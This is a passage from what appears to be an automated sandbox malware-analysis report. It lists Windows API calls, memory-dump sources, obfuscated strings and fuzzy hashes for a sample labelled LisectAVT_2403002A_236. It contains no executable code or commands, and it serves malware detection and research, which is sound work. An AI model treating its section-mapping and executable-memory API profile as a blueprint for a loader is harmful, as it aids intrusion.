                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID:
                    • API String ID: 292159236-0
                    • Opcode ID: 94d9175e7e328aca9be887c78d27ef082c5dc859e38976ca7d9f65328f5f6181
                    • Instruction ID: 8ba3df0d140103997c84cde76e96f8870f7288c17fe24dee28489d839abdca69
                    • Opcode Fuzzy Hash: 94d9175e7e328aca9be887c78d27ef082c5dc859e38976ca7d9f65328f5f6181
                    • Instruction Fuzzy Hash: C5316D71219340AFD765CF04C885B6BB7E8FB84354F405A1CF5A5CB3A0CBB49945CB52
                    APIs
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000002), ref: 003E282D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: SectionView
                    • String ID:
                    • API String ID: 1323581903-0
                    • Opcode ID: f30e6b5abe41fe527e24dea1938905443cefc0b45d4624101ad07ab4685eae78
                    • Instruction ID: 1cf53d80169a863b90f1134cc72a50ea3fa76af9debc963479623cb667fdf66e
                    • Opcode Fuzzy Hash: f30e6b5abe41fe527e24dea1938905443cefc0b45d4624101ad07ab4685eae78
                    • Instruction Fuzzy Hash: 2AF01C75280750EFE7219F18EC42F21B7F5BB09714F100618F7929AAE1C7B2B810CB04
                    APIs
                    • NtOpenSection.NTDLL(?,00000004), ref: 003E27C9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: OpenSection
                    • String ID:
                    • API String ID: 1950954290-0
                    • Opcode ID: 6a1e0cafc048e26387fb26b8d943c6b385cc204a00cd978b1e44c4f63c131420
                    • Instruction ID: e627f3ec0eedcfd34e1d51de8a1f7414a25a7c7875c5fd4d612467612d91c07c
                    • Opcode Fuzzy Hash: 6a1e0cafc048e26387fb26b8d943c6b385cc204a00cd978b1e44c4f63c131420
                    • Instruction Fuzzy Hash: 11E08CB2040280DBD746DB65EC02A3273A9BB84308F041018E282EB691C772F912CB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b6dd54768cb7e855c9eb4fcb055b316d9348a497885de48739d8556c552276aa
                    • Instruction ID: 39e959bea0cbeb5aa21531739aa3b494c57b9db570a597fbfd738ee5ce804c97
                    • Opcode Fuzzy Hash: b6dd54768cb7e855c9eb4fcb055b316d9348a497885de48739d8556c552276aa
                    • Instruction Fuzzy Hash: 0C2167B16007408FEB26DF24C9D1B96B7F2AF46304F08886CD99A8F766DB74E905CB51

                    Control-flow Graph

                    APIs
                    • KiUserCallbackDispatcher.NTDLL ref: 003DAE8B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID: $p>$p>$p>$p>$p>$p>$p>$p>$p>$p>
                    • API String ID: 2492992576-1812397219
                    • Opcode ID: 6173d61ef9a56b267123158d20f8c8fe99bcdc816061f31d19b6d1f23be09307
                    • Instruction ID: 3ea704d0411974c563dd8f76004d40607e121de4cedbc70c0840235cfe875092
                    • Opcode Fuzzy Hash: 6173d61ef9a56b267123158d20f8c8fe99bcdc816061f31d19b6d1f23be09307
                    • Instruction Fuzzy Hash: AB81BEB85093808FC365EF69D584A9EBBF0BBC9304F004A2DE48987390DBB09949CB53

                    Control-flow Graph

                    control_flow_graph 274 4097d7-4097e4 275 409862-409866 274->275 276 4097e6-4097e7 call 40dd97 274->276 278 409868-40986e 275->278 279 409899-40989c 275->279 284 4097ec-4097ef 276->284 280 409870-40987c 278->280 281 4097f1-4097f3 278->281 282 4098f7-4098fa 279->282 283 40989e-4098b5 call 40ab70 call 40d292 279->283 285 409883-409886 280->285 286 40987e call 40d5e2 280->286 289 409906-409909 281->289 290 409903-409905 282->290 291 4098fc-409902 call 40ae8a 282->291 283->281 305 4098bb-4098d2 call 40aaf5 283->305 284->281 288 4097f8-4097ff call 40aef8 284->288 285->290 295 409888-409897 call 40d893 call 40aba4 call 40ddc7 285->295 286->285 302 409801-409806 call 40ddc7 288->302 303 409808-409829 call 40dd4b call 442f88 call 40dc14 call 40d63f 288->303 290->289 291->290 295->290 302->281 330 409832-409839 call 40db59 303->330 331 40982b-409830 call 40aba4 303->331 320 4098d4-4098e9 call 40abe1 call 50f2f3 305->320 321 4098eb-4098f2 call 409fe4 305->321 320->290 321->281 337 40985b-409860 call 40d893 330->337 338 40983b-409842 call 40d8e1 330->338 331->302 337->331 338->337 343 409844-40984e call 40d41b 338->343 343->337 346 409850-409856 343->346 346->290
                    APIs
                    • __RTC_Initialize.LIBCMT ref: 00409808
                    • __mtterm.LIBCMT ref: 0040982B
                      • Part of subcall function 0040ABA4: TlsFree.KERNEL32(00000003,00409892), ref: 0040ABCF
                    • __setenvp.LIBCMT ref: 0040983B
                    • __cinit.LIBCMT ref: 00409846
                    • __mtterm.LIBCMT ref: 0040988D
                    • ___set_flsgetvalue.LIBCMT ref: 0040989E
                      • Part of subcall function 0040AB70: TlsGetValue.KERNEL32(?,004098A3), ref: 0040AB79
                      • Part of subcall function 0040AB70: TlsSetValue.KERNEL32(00000000,004098A3), ref: 0040AB9A
                      • Part of subcall function 0040D292: __calloc_impl.LIBCMT ref: 0040D2A3
                      • Part of subcall function 00409FE4: ___sbh_find_block.LIBCMT ref: 0040A00D
                      • Part of subcall function 00409FE4: ___sbh_free_block.LIBCMT ref: 0040A01C
                      • Part of subcall function 00409FE4: HeapFree.KERNEL32(00000000,0040861F,00417CF8,0000000C,0040F32F,00000000,00417FE8,0000000C,0040F369,0040861F,0040861F,?,0040D3CF,00000008,00000000,0040861F), ref: 0040A04C
                    • __freeptd.LIBCMT ref: 004098FD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: FreeValue__mtterm$HeapInitialize___sbh_find_block___sbh_free_block___set_flsgetvalue__calloc_impl__cinit__freeptd__setenvp
                    • String ID:
                    • API String ID: 3004107213-0
                    • Opcode ID: 1d2aab9d701c9ca5c068e647ca80e9f78ce663bd266a7484a82d2817e3bdaac9
                    • Instruction ID: 7b7dc12e4a12096ccc277b92f8813e3a977cf60cca017ba34d6bbf3c6cc89e65
                    • Opcode Fuzzy Hash: 1d2aab9d701c9ca5c068e647ca80e9f78ce663bd266a7484a82d2817e3bdaac9
                    • Instruction Fuzzy Hash: 4721A272924202A9D6247BF75C0256F3268AF92368B30843FF455B12C3EA3DDC46A56F
                    APIs
                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 003DF43F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: InformationVolume
                    • String ID: C$\
                    • API String ID: 2039140958-514332402
                    • Opcode ID: 1760bfdeb2e2c5055438ba07e51d38c769a694237b11f9e82d76cd3e4ebc1343
                    • Instruction ID: dd32f4c7ea7d5731d193df43b515839d3e23b82b5fb0d2116d99bf3a47b1b625
                    • Opcode Fuzzy Hash: 1760bfdeb2e2c5055438ba07e51d38c769a694237b11f9e82d76cd3e4ebc1343
                    • Instruction Fuzzy Hash: 69F065B5685341BBE319CF10EC56F2A32949784704F10442CB646AA1D1D7F0BA14CB59
                    APIs
                    • RtlFreeHeap.NTDLL(00000000,00000000), ref: 003E0F4C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: \-"#
                    • API String ID: 3298025750-2514456039
                    • Opcode ID: 1cfdb7b9af250b36df29f4763a543bc962410426ba1312b48e21f4250cf7d2df
                    • Instruction ID: e841fa391f31dd7b090c2b8f46752affdf1d06ceb191221cfd0c932a2470edd1
                    • Opcode Fuzzy Hash: 1cfdb7b9af250b36df29f4763a543bc962410426ba1312b48e21f4250cf7d2df
                    • Instruction Fuzzy Hash: F0111C702083519FD318CF14D8A4B2BBBA2FBC5318F148A1CE8AA47791C7759946CB86
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 18773158874858480531784dff4092e23d874de3c66bd5f908e7bdc2364e6812
                    • Instruction ID: e7c9e5882397a5c3f2b22080536da34c1f50aa6f6661223147bdf20149117e76
                    • Opcode Fuzzy Hash: 18773158874858480531784dff4092e23d874de3c66bd5f908e7bdc2364e6812
                    • Instruction Fuzzy Hash: 04417CB4100B42EBD316CF26ECA1636BBB5FB46301F508B18D4564BBA1D730E6A5CF94
                    APIs
                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 003E0DDC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: d5d16adece008cf24671bb22b64977da42be0ce23746572b20d33e977c6fdab5
                    • Instruction ID: 6497b3f4884a040deebaaf070356ee0a7c2dbc2cb4cfc1337576f105225314f3
                    • Opcode Fuzzy Hash: d5d16adece008cf24671bb22b64977da42be0ce23746572b20d33e977c6fdab5
                    • Instruction Fuzzy Hash: CF4144342406418FD315CF29C894B16BBA3EB85324F24C66CD9A58BBA5D776F847CB80
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: AllocString
                    • String ID:
                    • API String ID: 2525500382-0
                    • Opcode ID: 65d317bb8979a2a77814610f74c8b460754ad209f6c7a8f6fe89411d827484bb
                    • Instruction ID: 7c5ed448b9bd3195eb83bb973d822afec22e540109a021bc0930568c4f74348a
                    • Opcode Fuzzy Hash: 65d317bb8979a2a77814610f74c8b460754ad209f6c7a8f6fe89411d827484bb
                    • Instruction Fuzzy Hash: FE51B47111CBC28AC331CB28889978ABFE1ABD6224F184B5DE5E98B3E1C7758145CB57
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: d4729bf83480ca908db07acde3c66166cb75614bcee9e37b2af701265aac86e8
                    • Instruction ID: ae88f7bb4549c9d4c8249cd9d7fa0c6be4b05c85f89ab1975f0a109fab905141
                    • Opcode Fuzzy Hash: d4729bf83480ca908db07acde3c66166cb75614bcee9e37b2af701265aac86e8
                    • Instruction Fuzzy Hash: CE219DB4100B82EBD316CF22ECA1632BBA5FB45301F508B1CD45647BA1D730A6A1CB94
                    APIs
                    • LoadLibraryW.KERNELBASE(?), ref: 003E342A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 7b6d0977b32dac14aed288272dd668009a8be9ee16f06efa9f4476a618a962c0
                    • Instruction ID: 2ff6ab5db6472f14ec3c3c7d0d9401b6f70808053875fd697ab275dcb9f1567d
                    • Opcode Fuzzy Hash: 7b6d0977b32dac14aed288272dd668009a8be9ee16f06efa9f4476a618a962c0
                    • Instruction Fuzzy Hash: AA1114B4204B428BC31ACF26D8A4727BBB5FF46314F509A4CC4A65BBA1C730F981CB84
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 12ac4b3895e5243134287c7e399db5f867efcab4716ab9b26e6eaaff746481be
                    • Instruction ID: 75757d7d3a5b93238b5428a6a217a4facbd6b80032b978410210a0cf299a7c4a
                    • Opcode Fuzzy Hash: 12ac4b3895e5243134287c7e399db5f867efcab4716ab9b26e6eaaff746481be
                    • Instruction Fuzzy Hash: 0D1137741007428BD31ACF16D5A4626FBB2BF85314F5ACA4DC4A64BB95CB34E582CF84
                    APIs
                    • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 003E42D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: abfe98364a4d678f2344e45f3de73fefe6a360999204b78082e002f642c0c594
                    • Instruction ID: 91446048f28d2a0c978e80a953fe3d596ccf1c3ae6827259e2bf77e5a202e381
                    • Opcode Fuzzy Hash: abfe98364a4d678f2344e45f3de73fefe6a360999204b78082e002f642c0c594
                    • Instruction Fuzzy Hash: D01145766093519FD300CF05C84435FFBA2EBC4329F25CA58E9A827284D731D90A8BD2
                    APIs
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 003CFC9D
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 003CFCC6
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 003D00DD
                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 003D010B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: EnvironmentExpandStrings
                    • String ID: MO${cC$qrs
                    • API String ID: 237503144-1992789174
                    • Opcode ID: 35474ca0131c7b413e63086aa1a9a18a00b2b52538884f31401b1e26a0fb69e9
                    • Instruction ID: 301548fee9ff3eb5adab49ec195b2a17973c6731a4a4a70ada91432d9d51f28c
                    • Opcode Fuzzy Hash: 35474ca0131c7b413e63086aa1a9a18a00b2b52538884f31401b1e26a0fb69e9
                    • Instruction Fuzzy Hash: 273249B1500A009FD725CF29C495B17BBF2FB89324F158A5DD8AA8BB99D730E815CBC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8#$@%z'$X!G#$Y5[7$Z-K/$d)C+$d9:;$s1]3$s;$s}
                    • API String ID: 0-3001701124
                    • Opcode ID: 9d30e288a2bef91a97465712db77debd21a9ee98f14e1bb36b4f8901b46d0eba
                    • Instruction ID: e0d7831a08093cb0501d9c017c7da0e53b530130ed4527cd63bf3d9e12fea5cc
                    • Opcode Fuzzy Hash: 9d30e288a2bef91a97465712db77debd21a9ee98f14e1bb36b4f8901b46d0eba
                    • Instruction Fuzzy Hash: 3F91ABB05183418BD725CF18C890B6BBBF1FF82354F149A2DF9A69B291D374D906CB92
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 003D28F6
                    • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 003D294F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
